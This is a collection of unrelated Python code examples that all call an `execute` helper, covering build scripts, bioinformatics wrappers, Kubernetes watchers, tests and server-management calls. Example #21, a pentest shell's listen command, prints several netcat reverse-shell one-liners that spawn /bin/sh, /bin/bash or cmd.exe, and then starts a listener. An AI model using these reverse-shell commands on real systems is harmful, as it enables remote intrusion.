def dev_install_extension():
    delete_directory(extension_dir)
    generate_extension()
    build_vue_project()
    execute(None, f'jupyter nbextension uninstall {jupyter_extension_name}')
    execute(None, f'pip install -e {extension_dir}')
    execute(None, f'jupyter nbextension install --py --symlink --sys-prefix {ipy_extension_name}')
    execute(None, f'jupyter nbextension enable --py --sys-prefix {ipy_extension_name}')
    execute(None, f'jupyter labextension install {extension_dir}/js --no-build')
Example #2
    def default(self, args):
        split_args = args.split()
        if (split_args[0] == 'cd'):
            path = split_args[1]
            if (path[0] == '~'):
                path = os.path.expanduser(path)
            os.chdir(path)
            return
        helpers.execute("{}".format(args))
Example #3
def clean_host_reads(input_file_fullpath, host_ref_fullpath,
                     output_file_fullpath, maxindel=10, minid=0.95,
                     remove_files=True, verbose=False, threads=20, run=True):

    """Wrapper for the removal of host-mapped reads

    Dependencies:
        BBMap (https://jgi.doe.gov/data-and-tools/bbtools/bb-tools-user-guide/bbmap-guide/)
        samtools (https://github.com/samtools/)

    Parameters:
        input_file_fullpath (str): path to the input reads file
        host_ref_fullpath (str): path to the host reference passed to bbmap.sh
        output_file_fullpath (str): path of the host-cleaned FASTA output
        maxindel (int): maximum indel size passed to bbmap.sh (default is 10)
        minid (float): minimum alignment identity passed to bbmap.sh (default is 0.95)
        remove_files (bool): remove the intermediate BAM file (default is True)
        verbose (bool): print the commands before running them (default is False)
        threads (int): number of threads passed to bbmap.sh (default is 20)
        run (bool): execute the commands instead of only printing them (default is True)

    Returns:
        None
    """

    suffix = os.path.splitext(input_file_fullpath)[1]
    bam_file_fullpath = input_file_fullpath.replace(suffix, '.bam')
    
    cmd = ('bbmap.sh '
           'in=%s ' 
           'ref=%s '
           'outu=%s '
           'maxindel=%s '
           'minid=%s '
           't=%s '
           % (input_file_fullpath,host_ref_fullpath,bam_file_fullpath,maxindel,minid,threads)
          )
    
    print('Cleaning host reads using %s...'% host_ref_fullpath )
    if verbose:
        print(cmd)

    if run:
        execute(cmd,screen=True)
    
    cmd = ('samtools fasta %s > %s' % (bam_file_fullpath, output_file_fullpath) )
    if verbose:
        print(cmd)

    if run:
        execute(cmd,screen=True)

    if remove_files:
        os.remove(bam_file_fullpath)
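
A minimal usage sketch for the wrapper above (not part of the original project): it assumes clean_host_reads is in scope and uses hypothetical file paths; with run=False the function only prints the bbmap.sh and samtools commands instead of executing them.

# Hypothetical dry run: run=False only builds and prints the commands, and
# remove_files=False avoids deleting a BAM file that was never created.
clean_host_reads(
    input_file_fullpath='/data/sample.fastq',         # placeholder input reads
    host_ref_fullpath='/refs/host_genome.fna',        # placeholder host reference
    output_file_fullpath='/data/sample.clean.fasta',  # placeholder output path
    remove_files=False,
    verbose=True,
    run=False,
)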
Example #4
def list_resources(label, label_value, target_folder, request_url,
                   request_method, request_payload, namespace,
                   folder_annotation, resource, unique_filenames, script,
                   enable_5xx, ignore_already_processed):
    v1 = client.CoreV1Api()
    # Filter resources based on label and value or just label
    label_selector = f"{label}={label_value}" if label_value else label

    additional_args = {'label_selector': label_selector}
    if namespace != "ALL":
        additional_args['namespace'] = namespace

    ret = getattr(v1, _list_namespace[namespace][resource])(**additional_args)

    files_changed = False

    # For all the found resources
    for item in ret.items:
        metadata = item.metadata

        # Ignore already processed resource
        # Avoid numerous logs about useless resource processing each time the LIST loop reconnects
        if ignore_already_processed:
            if _resources_version_map.get(
                    metadata.namespace +
                    metadata.name) == metadata.resource_version:
                # print(f"{timestamp()} Ignoring {resource} {metadata.namespace}/{metadata.name}")
                continue

            _resources_version_map[metadata.namespace +
                                   metadata.name] = metadata.resource_version

        print(
            f"{timestamp()} Working on {resource}: {metadata.namespace}/{metadata.name}"
        )

        # Get the destination folder
        dest_folder = _get_destination_folder(metadata, target_folder,
                                              folder_annotation)

        if resource == RESOURCE_CONFIGMAP:
            files_changed |= _process_config_map(dest_folder, item, resource,
                                                 unique_filenames, enable_5xx)
        else:
            files_changed |= _process_secret(dest_folder, item, resource,
                                             unique_filenames, enable_5xx)

    if script and files_changed:
        execute(script)

    if request_url and files_changed:
        request(request_url, request_method, enable_5xx, request_payload)
Example #5
def _watch_resource_iterator(label, label_value, target_folder, url, method,
                             payload, current_namespace, folder_annotation,
                             resource, unique_filenames, script):
    v1 = client.CoreV1Api()
    namespace = os.getenv("NAMESPACE", current_namespace)
    # Filter resources based on label and value or just label
    label_selector = f"{label}={label_value}" if label_value else label

    if namespace == "ALL":
        stream = watch.Watch().stream(getattr(
            v1, _list_for_all_namespaces[resource]),
                                      label_selector=label_selector,
                                      _request_timeout=60)
    else:
        stream = watch.Watch().stream(getattr(v1, _list_namespaced[resource]),
                                      namespace=namespace,
                                      label_selector=label_selector,
                                      _request_timeout=60)

    # Process events
    for event in stream:
        item = event["object"]
        metadata = item.metadata
        event_type = event["type"]

        print(
            f"{timestamp()} Working on {event_type} {resource} {metadata.namespace}/{metadata.name}"
        )

        files_changed = False

        # Get the destination folder
        dest_folder = _get_destination_folder(metadata, target_folder,
                                              folder_annotation)

        item_removed = event_type == "DELETED"
        if resource == RESOURCE_CONFIGMAP:
            files_changed |= _process_config_map(dest_folder, item, resource,
                                                 unique_filenames,
                                                 item_removed)
        else:
            files_changed |= _process_secret(dest_folder, item, resource,
                                             unique_filenames, item_removed)

        if script and files_changed:
            execute(script)

        if url and files_changed:
            request(url, method, payload)
Example #6
    def get_magnet(results):
        print("Processing magnet link")
        magnet = results['magnet']
        command = "peerflix \"%s\"" % magnet
        if sub_lang is not None:
            subtitle = get_subtitle(magnet, sub_lang)
            if subtitle is not None:
                command += " -t %s" % subtitle
        if port is not None:
            command += " -p%s" % port
        if not serve:
            command += " --vlc"

        print("executing command %s" % command)
        execute(command)
Example #8
def build_vue_project(watch=False):
    if not directory_exists(f'{vue_project_dir}/node_modules'):
        execute(vue_project_dir, 'yarn install')

    try:
        # keep using --mode production with --watch, else css is not included
        execute(
            vue_project_dir,
            f'npx vue-cli-service build --target lib \
            --formats {"umd"} \
            --dest {extension_dir}/js/vue_project_dist_mirror \
            --name component src/{settings["entry"]} \
            --mode production \
            {"--watch" if watch else ""}')
    except KeyboardInterrupt:
        pass
Example #9
def _watch_resource_iterator(label, label_value, target_folder, request_url,
                             request_method, request_payload, namespace,
                             folder_annotation, resource, unique_filenames,
                             script, enable_5xx):
    v1 = client.CoreV1Api()
    # Filter resources based on label and value or just label
    label_selector = f"{label}={label_value}" if label_value else label

    additional_args = {'label_selector': label_selector}
    if namespace != "ALL":
        additional_args['namespace'] = namespace

    stream = watch.Watch().stream(
        getattr(v1, _list_namespace[namespace][resource]), **additional_args)

    # Process events
    for event in stream:
        item = event["object"]
        metadata = item.metadata
        event_type = event["type"]

        print(
            f"{timestamp()} Working on {event_type} {resource} {metadata.namespace}/{metadata.name}"
        )

        files_changed = False

        # Get the destination folder
        dest_folder = _get_destination_folder(metadata, target_folder,
                                              folder_annotation)

        item_removed = event_type == "DELETED"
        if resource == RESOURCE_CONFIGMAP:
            files_changed |= _process_config_map(dest_folder, item, resource,
                                                 unique_filenames, enable_5xx,
                                                 item_removed)
        else:
            files_changed |= _process_secret(dest_folder, item, resource,
                                             unique_filenames, enable_5xx,
                                             item_removed)

        if script and files_changed:
            execute(script)

        if request_url and files_changed:
            request(request_url, request_method, enable_5xx, request_payload)
Example #10
    def test_not_empty_title_metadata(self):
        output_file = f'{self.OUTPUT_DIR}/not_empty_title_metadata_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/not_empty_title_metadata_test.txt',
            '-o', output_file, '--legacy-mode', '--template',
            f'{h.INPUT_DIR}/test_template_title.html'
        ], output_file)

        self.assertEqual('test title from metadata', root.head.title.text)
Example #11
    def test_not_empty_title_cli(self):
        output_file = f'{self.OUTPUT_DIR}/not_empty_title_cli_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/any_content.txt', '-o', output_file,
            '--template', f'{h.INPUT_DIR}/test_template_title.html', '--title',
            'test title from CLI'
        ], output_file)

        self.assertEqual('test title from CLI', root.head.title.text)
Example #12
def destroyServer(subid):
    data = {'SUBID': subid}

    response = execute('server_destroy', method='post', data=data)

    if response.status_code == 200:
        return print(f'server {subid} destroyed')

    print('there was a problem!')
Example #13
    def test_no_css(self):
        output_file = f'{self.OUTPUT_DIR}/no_css_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/any_content.txt', '-o', output_file,
            '--template', f'{h.INPUT_DIR}/test_template_styles.html',
            '--no-css'
        ], output_file)

        self.assertIsNone(root.head.link)
        self.assertIsNone(root.head.style)
Example #14
    def test_not_empty_title_cli_overridden(self):
        output_file = f'{self.OUTPUT_DIR}/not_empty_title_cli_overridden_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/not_empty_title_metadata_test.txt',
            '-o', output_file, '--template',
            f'{h.INPUT_DIR}/test_template_title.html', '--title',
            'test title from CLI overridden'
        ], output_file)

        self.assertEqual('test title from CLI overridden',
                         root.head.title.text)
Example #15
def test_collect(endpoint_csv):
    returncode, outs, errs = execute(["digital-land", "collect", endpoint_csv])

    log_date = datetime.utcnow().isoformat()[:10]
    log_file = f"./collection/log/{log_date}/{hash_digest(ENDPOINT)}.json"

    assert returncode == 0, "return code non-zero"
    assert "ERROR" not in errs

    resource = read_log(log_file)
    assert resource
    assert resource_collected(resource)
Example #16
    def scan(self, args, loggingdir):
        # no scan or target is specified so just print the scans
        if(args == ''):
            self.list_scans()
            return

        # scan is specified but no target so just print that scan
        split_args = args.split()
        scan_name = split_args[0]
        
        if(scan_name in self.scans_dict):

            # use the scan objects replace method
            parsed_args = self.parse_arguments(split_args[1:])
            scan_cmd_replaced_args = self.scans_dict[scan_name].replace_arguments_in_cmd(parsed_args)
            if(scan_cmd_replaced_args is not None):
                # try and make the log file in the logging directory
                log_file_name = loggingdir + '/' + scan_name + '_' + datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S-%m-%d-%Y')
                helpers.execute(scan_cmd_replaced_args, log_file_name)
        else:
            ColorPrint.print_fail("ERROR: scan {} not found.".format(scan_name))
Example #17
def list_resources(label, label_value, target_folder, request_url,
                   request_method, request_payload, namespace,
                   folder_annotation, resource, unique_filenames, script,
                   enable_5xx):
    v1 = client.CoreV1Api()
    # Filter resources based on label and value or just label
    label_selector = f"{label}={label_value}" if label_value else label

    additional_args = {'label_selector': label_selector}
    if namespace != "ALL":
        additional_args['namespace'] = namespace

    ret = getattr(v1, _list_namespace[namespace][resource])(**additional_args)

    files_changed = False

    # For all the found resources
    for item in ret.items:
        metadata = item.metadata

        print(
            f"{timestamp()} Working on {resource}: {metadata.namespace}/{metadata.name}"
        )

        # Get the destination folder
        dest_folder = _get_destination_folder(metadata, target_folder,
                                              folder_annotation)

        if resource == RESOURCE_CONFIGMAP:
            files_changed |= _process_config_map(dest_folder, item, resource,
                                                 unique_filenames, enable_5xx)
        else:
            files_changed |= _process_secret(dest_folder, item, resource,
                                             unique_filenames, enable_5xx)

    if script and files_changed:
        execute(script)

    if request_url and files_changed:
        request(request_url, request_method, enable_5xx, request_payload)
Example #18
    def test_link_css(self):
        output_file = f'{self.OUTPUT_DIR}/link_css_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/any_content.txt', '-o', output_file,
            '--template', f'{h.INPUT_DIR}/test_template_styles.html',
            '--link-css', '../../../test_input/test_styles.css'
        ], output_file)

        self.assertIsNone(root.head.style)
        link = root.head.link
        self.assertEqual(['stylesheet'], link['rel'])
        self.assertEqual('text/css', link['type'])
        self.assertEqual('../../../test_input/test_styles.css', link['href'])
Example #19
    def test_include_css(self):
        output_file = f'{self.OUTPUT_DIR}/include_css_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/any_content.txt', '-o', output_file,
            '--template', f'{h.INPUT_DIR}/test_template_styles.html',
            '--include-css',
            str(h.WORKING_DIR.joinpath('test_input/test_styles.css'))
        ], output_file)

        self.assertIsNone(root.head.link)
        style = root.head.style
        self.assertEqual('body {background-color: burlywood;}',
                         style.contents[0].strip())
Example #20
def _test_convert(input_file):
    output_file = input_file.with_suffix(".out")
    print(f"output  file: {output_file}")
    returncode, outs, errs = execute(
        ["digital-land", "convert", input_file, output_file])

    assert returncode == 0, "return code non-zero"
    assert "ERROR" not in errs

    output = read_csv(output_file)
    assert len(output) == 2
    assert output[0]["field-1"] == "row-1-data-1"
    assert output[1]["field-3"] == "row-2-data-3"
Example #21
    def do_listen(self, args):
        '\x1b[1;34mListen on a port. Usage: "listen [port]"\x1b[0m'
        port = args
        if (port == ''):
            port = random.randint(1024, 65535)
        ip_addresses = helpers.get_ip_addresses()
        ColorPrint.print_pass(
            "Use these commands to connect to your listener:")
        for ip in ip_addresses:
            ColorPrint.print_pass("***** {} *****".format(ip))
            ColorPrint.print_info("nc {} {} -e /bin/bash".format(ip, port))
            ColorPrint.print_info("nc -c /bin/sh {} {}".format(ip, port))
            ColorPrint.print_info("/bin/sh | nc {} {}".format(ip, port))
            ColorPrint.print_info(
                "rm -f /tmp/p; mknod /tmp/p p && nc {} {} 0</tmp/p | /bin/sh 1>/tmp/p".format(
                    ip, port))
            ColorPrint.print_info("nc {} {} -e cmd.exe".format(ip, port))
            ColorPrint.print_info(
                "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {} {} >/tmp/f"
                .format(ip, port))

        helpers.execute('nc -lvnp {}'.format(port))
        print()
Example #22
def _execute_convert(input_file, output_file):
    returncode, outs, errs = execute([
        "digital-land",
        "-n",
        "some-pipeline",
        "-p",
        "tests/data/pipeline",
        "-s",
        "tests/data/specification",
        "convert",
        input_file,
        output_file,
    ])
    assert returncode == 0, f"return code non-zero: {errs}"
    assert "ERROR" not in errs
Example #23
def create_server(hostname):
    hostname_parts = hostname.split(delimiter)
    label = delimiter.join(hostname_parts[:-1])

    data = {
        'DCID': 39,
        'VPSPLANID': 201,
        'OSID': 270,
        'SSHKEYID': '5c5e3f4ee8b5d',
        'hostname': hostname,
        'tag': label,
        'label': hostname
    }

    return execute('server_create', method='post', data=data)
Example #24
    def test_legacy_mode(self):
        without_arg_file = h.execute_simple(
            f'{h.INPUT_DIR}/{self.CLASS_NAME}/legacy_source_text.txt',
            f'{self.OUTPUT_DIR}/test_in_legacy_mode_without_arg_file.html',
            f'{h.INPUT_DIR}/{self.CLASS_NAME}/legacy_template.html',
            '--legacy-mode', '--link-css',
            '../../../test_input/test_styles.css')

        output_file = f'{self.OUTPUT_DIR}/test_in_legacy_mode_with_arg_file.html'
        with_arg_file = h.execute([
            '--argument-file',
            f'{h.INPUT_DIR}/{self.CLASS_NAME}/argument_file.json', '--output',
            output_file, '--legacy-mode'
        ], output_file)

        for root, test_name in [(without_arg_file, 'without_arg_file'),
                                (with_arg_file, 'with_arg_file')]:
            with self.subTest(test_name=test_name):
                self.assertEqual('test title from metadata',
                                 root.head.title.text)

                self.assertIsNone(root.head.style)
                link = root.head.link
                self.assertEqual(['stylesheet'], link['rel'])
                self.assertEqual('text/css', link['type'])
                self.assertEqual('../../../test_input/test_styles.css',
                                 link['href'])

                pattern = re.compile(r'\d')
                paragraphs = root.body.find_all('p')
                self.assertEqual(6, len(paragraphs))
                self.assertEqual('Generator name: md2html_',
                                 paragraphs[0].text[0:24])
                self.assertEqual('Generator version: X.X.X',
                                 pattern.sub('X', paragraphs[1].text))
                self.assertEqual('Generation date: XXXX-XX-XX',
                                 pattern.sub('X', paragraphs[2].text))
                self.assertEqual('Generation time: XX:XX:XX',
                                 pattern.sub('X', paragraphs[3].text))
                self.assertEqual('Custom value: test custom value',
                                 paragraphs[4].text)
                self.assertEqual('Legacy content.', paragraphs[5].text)
Example #25
    def test_placeholders(self):
        output_file = f'{self.OUTPUT_DIR}/placeholders_test.html'
        root = h.execute([
            '-f', '-i', f'{h.INPUT_DIR}/placeholders_test.txt', '-o',
            output_file, '--template',
            f'{h.INPUT_DIR}/test_template_placeholders.html', '--no-css',
            '--legacy-mode'
        ], output_file)

        pattern = re.compile(r'\d')
        paragraphs = root.body.find_all('p')
        self.assertEqual(5, len(paragraphs))
        self.assertEqual('Generator name: md2html_', paragraphs[0].text[0:24])
        self.assertEqual('Generator version: X.X.X',
                         pattern.sub('X', paragraphs[1].text))
        self.assertEqual('Generation date: XXXX-XX-XX',
                         pattern.sub('X', paragraphs[2].text))
        self.assertEqual('Generation time: XX:XX:XX',
                         pattern.sub('X', paragraphs[3].text))
        self.assertEqual('Custom value: test custom value', paragraphs[4].text)
Example #26
File: linux.py  Project: micodls/adelie
    def __update(self):
        # helpers.execute("echo "nameserver 8.8.8.8" | sudo tee /etc/resolv.conf > /dev/null", "pipe") # hack for update
        helpers.execute("sudo apt-get update --quiet")
Example #27
def merge_similar_nodes(G, cluster_id=0.9, min_net_size=3, threads=20, verb=False, run=True):

    """Collapse similar nodes (sequence identity > cluster_id) within domain networks

    Dependencies:
        vsearch (https://github.com/torognes/vsearch)

    Parameters:
        G (nx.Graph): input network whose nodes carry 'seq', 'clusterSize', 'well' and 'compressed' attributes
        cluster_id (float): minimum sequence identity for two nodes to be clustered (default is 0.9)
        min_net_size (int): sub-networks smaller than this are skipped (default is 3)
        threads (int): number of threads passed to vsearch (default is 20)
        verb (bool): verbose logging (default is False)
        run (bool): execute the vsearch command instead of only logging it (default is True)

    Returns:
        (contraction_df, T) tuple(pd.DataFrame, nx.Graph): a table of the node contractions and the contracted network
    """

    compressed_dict = defaultdict(list)
    T = G.copy()
    clusterSize_dict = nx.get_node_attributes(T,'clusterSize')
    
    #iterate over all sub-networks and annotate according to netNum
    nodesBySub = sorted(nx.connected_components(G), key = len, reverse=True)
    if verb:
        log('%s sub-networks found...' % (len(nodesBySub) ))
    
    log('%s networks found... ' % len(nodesBySub))
    for i,sub in enumerate(nodesBySub):
        #try:
        if (i%100 == 0):
            log(i)
            
        if len(sub) < min_net_size:
            continue
        
        #make tempdir and files 
        tmpdir = tempfile.mkdtemp()
        input_file = 'network_nodes.fna'
        input_file = os.path.join(tmpdir, input_file)

        centroids_filename = input_file.replace('.fna','_OTU.fna')
        centroids_filename = os.path.join(tmpdir, centroids_filename)

        table_filename = input_file.replace('.fna','_OTU.txt')
        table_filename = os.path.join(tmpdir, table_filename)

        # Ensure the file is read/write by the creator only
        saved_umask = os.umask(0o077)

        s = pd.Series(dict(zip(sub,sub)))
        s = s.map(clusterSize_dict).sort_values(ascending=False)
        headers = s.index.values
        seqs = s.index.map(nx.get_node_attributes(G,'seq')).values

        makeFasta(headers,seqs,input_file)

        cmd = ('vsearch '
               '--cluster_fast %s '
               '--id %s '
               '--centroids %s '
               '--uc %s '
               '-sizein '
               '--threads %s '  %
                (input_file,cluster_id,centroids_filename,table_filename,threads)
               )

        if verb:
            log('\n')
            log(cmd)

        if run:
            execute(cmd)

        if verb:
                log('Parsing OTU information from %s' % table_filename)

        no_table_flag = False
        try:
            otuDF = pd.read_csv(table_filename,sep='\t',index_col=None)
            otuDF.columns  = ['type','cluster','length','ident','strand','','','align','q','h']
        except:
            log('Unable to read clustering table %s...' % table_filename )
            no_table_flag = True


        #except:
        #print 'IOError'
        #sys.exit()

        finally:
        #clear temp files 
            try:
                os.remove(input_file)
                os.remove(centroids_filename)
                os.remove(table_filename)
                os.umask(saved_umask)
                os.rmdir(tmpdir)
            except:
                log('Unable to remove temp files at %s...' % tmpdir)
        
        if (no_table_flag):
            continue
        
        #Only consider 'Hit' or 'Seed' rows 
        otuDF = otuDF[ (otuDF.type == 'H') | (otuDF.type == 'S') ]
        #Select only seed rows
        seedsIndex = otuDF[otuDF['type'] == 'S'].index
        #For seeds put self as hit
        otuDF.loc[seedsIndex,'h'] = otuDF.loc[seedsIndex,'q'] 
        
        #compress similar nodes based on vsearch clustering output  
        counter = 0
        for seed, group in otuDF.groupby('h'):
            #iteratively contract all nodes in the cluster into the centroid node
            for node in group['q'].values:
                if node == seed:
                    continue
                if verb:
                    log('Compressing node %s into node %s' % (seed,node))
                #log all merges  
                compressed_dict[seed].append(node)
                #merge wells of contracted nodes 
                T.node[seed]['well'] = T.node[seed]['well'] + '_' + T.node[node]['well']
                T.node[seed]['well'] = '_'.join(sorted(list(set(T.node[seed]['well'].split('_')))))
                #flag as compressed 
                T.node[seed]['compressed'] = int(T.node[seed]['compressed']) + 1
                T = nx.contracted_nodes(T,seed,node)
                counter += 1 
        if verb:
            log('Compressed %s nodes...' % (counter))
    
    contraction_dict = nx.get_node_attributes(T,'contraction')

    contraction_df = pd.DataFrame.from_dict({(i,j): contraction_dict[i][j] 
                           for i in contraction_dict.keys() 
                           for j in contraction_dict[i].keys()},
                       orient='index')
    
    for node in T.nodes():
        if 'contraction' in T.node[node].keys():
            del T.node[node]['contraction']
    
    return (contraction_df,T)
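
The heavy lifting in merge_similar_nodes is done by nx.contracted_nodes; the small self-contained illustration below (assuming networkx 2.x, not tied to the project above) shows how a contraction merges edges and records the absorbed node under the 'contraction' attribute that the function later reads back with nx.get_node_attributes.

import networkx as nx

# Toy graph: contracting 'b' into 'a' rewires b's edges onto a and stores
# b's (empty) attribute dict under H.nodes['a']['contraction'].
G = nx.Graph()
G.add_edges_from([('a', 'b'), ('b', 'c')])
H = nx.contracted_nodes(G, 'a', 'b', self_loops=False)
print(sorted(H.edges()))                         # [('a', 'c')]
print(nx.get_node_attributes(H, 'contraction'))  # {'a': {'b': {}}}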
Example #28
            print("  ")
            print("===> run test %s/%s ..." % (run_test[0], run_test[1]))
            #change to test directory
            os.chdir(run_test[0])
            if (not os.path.isfile('./' + run_test[1])):
                print("!!!!!!!!  PARAMTERFILE %s/%s does not exist!" %
                      (run_test[0], run_test[1]))
                os.chdir(cwd)
                return False

            projectname = read_prm(run_test[1], 'ProjectName')
            projectnamex = ("%s_%d_%s" % (projectname, case, project))
            success = False
            try:
                [L2,Linf,PID] = execute(cwd+"/"+builddir+"/bin/fluxo", run_test[1], projectnamex,\
                                      [get_last_L2_error, get_last_Linf_error, get_cpu_per_dof],\
                                      log = True, ntail = ntail ,\
                                            mpi_procs = mpi_procs )
                if (Linf):
                    print("   ... check Linf %s < %s ?" %
                          (Linf[0], run_test[2]))
                    if (float(Linf[0]) < float(run_test[2])):
                        success = True
            except:
                success = False
            if (not success):
                print("================================================== ")
                print("!!!! PROBLEM WITH RUN, NOT FINISHED CORRECTLY!!!!! ")
                err.extend(["caseID=%6d ,project= %s <=Run" % (case, project)])
                print("================================================== ")
                print("  ")
                os.chdir(cwd)
Example #29
def list_servers():
    response = execute('server_list')

    return response.json()
Example #30
        output_full_path = OUTPATH + 'trim/' + output_filenmae

        cmd = ('vsearch '
               '--threads %s ' 
               '--fastx_filter %s '
               '--fastaout %s '
               '--fastq_stripleft %s '
               '--fastq_trunclen %s '
               % (threads,input_full_path,output_full_path,strip_left,truncate)
              )
        
        if verbose:
            log('\n')
            log(cmd)

        execute(cmd,screen=verbose)

        #dereplicate
        input_file = output_full_path
        output_filenmae = output_filenmae.replace(sufix,'.derep' + sufix)
        output_full_path = OUTPATH + 'derep/' + output_filenmae

        cmd = ('vsearch '
               '--threads %s ' 
               '--derep_fulllength %s '
               '--strand plus '
               '--output %s '
               '-sizeout '
               '--fasta_width 0'
               % (threads,input_file,output_full_path)
              )
Example #31
File: linux.py  Project: micodls/adelie
    def __remove(self, command):
        helpers.execute("sudo apt-get purge {}".format(command))
        self.__clean()
Example #32
        projectnameX = projectname + '_Degree_' + Degree[
            i] + '_Mesh_' + meshname
        modify_prm(args.prm, {'ProjectName': projectnameX})
        print("               ")
        print("%3i %3i === > ProjectName: %s" % (i, m, projectnameX))
        print("               ")
        # modify parameters by replacing string
        #    args.prm = [w.replace('NEX',nElemsX[i] ) for w in args.prm]
        modify_prm(args.prm, {'N': Degree[i]})
        modify_prm(args.prm, {'MeshFile': Meshes[m]})

        # execute fluxo
        start_time = time.time()
        try:
            [L2,Linf,PID] = execute(args.exe, args.prm, projectnameX,\
                                    [get_last_L2_error, get_last_Linf_error, get_cpu_per_dof],\
                                    log = True, ntail = args.ntail ,\
                                    mpi_procs = args.procs )
        except:
            shutil.rmtree(tmp_dir)
            exit(1)
        end_time = time.time()

        nVar = len(L2)
        if (header):
            summaryheader = ("%-8s " % " Degree")
            summaryheader = summaryheader + (", %45s " % "Meshname")
            for ivar in range(0, nVar):
                summaryheader = summaryheader + (", %10s%2i%-9s " %
                                                 ("   L2(", ivar + 1, ")"))
            for ivar in range(0, nVar):
                summaryheader = summaryheader + (", %10s%2i%-9s " %
Example #33
File: linux.py  Project: micodls/adelie
    def __upgrade(self):
        helpers.execute("sudo apt-get upgrade")
Example #34
# loop over meshes
for j in range(0, nNgeo):
    for i in range(0, nLevel):

        projectnameX = projectname + '_Ngeo_' + Ngeo[j] + '_Level_' + Level1[i]
        modify_prm(args.prm, {'ProjectName': projectnameX})
        print("               ")
        print("%03.0i === > ProjectName: %s" % (i, projectnameX))
        print("               ")
        # modify parameters by replacing string
        #    args.prm = [w.replace('NEX',nElemsX[i] ) for w in args.prm]
        modify_prm(args.prm, {'DEFVAR=(INT):n_1': Level1[i]})
        modify_prm(args.prm, {'DEFVAR=(INT):n_2': Level2[i]})
        bo = str(int(Ngeo[j]) + 1)
        modify_prm(args.prm, {'BoundaryOrder': bo})

        # execute hopr
        start_time = time.time()
        try:
            execute(args.exe, args.prm, projectnameX, log = True, ntail = args.ntail ,\
                    mpi_procs = args.procs)
        except:
            shutil.rmtree(tmp_dir)
            exit(1)
        end_time = time.time()

        #print( end_time - start_time)
        sys.stdout.flush()

shutil.rmtree(tmp_dir)
Example #35
File: linux.py  Project: micodls/adelie
    def __clean(self):
        helpers.execute("sudo apt-get autoremove")
        helpers.execute("sudo apt-get autoclean")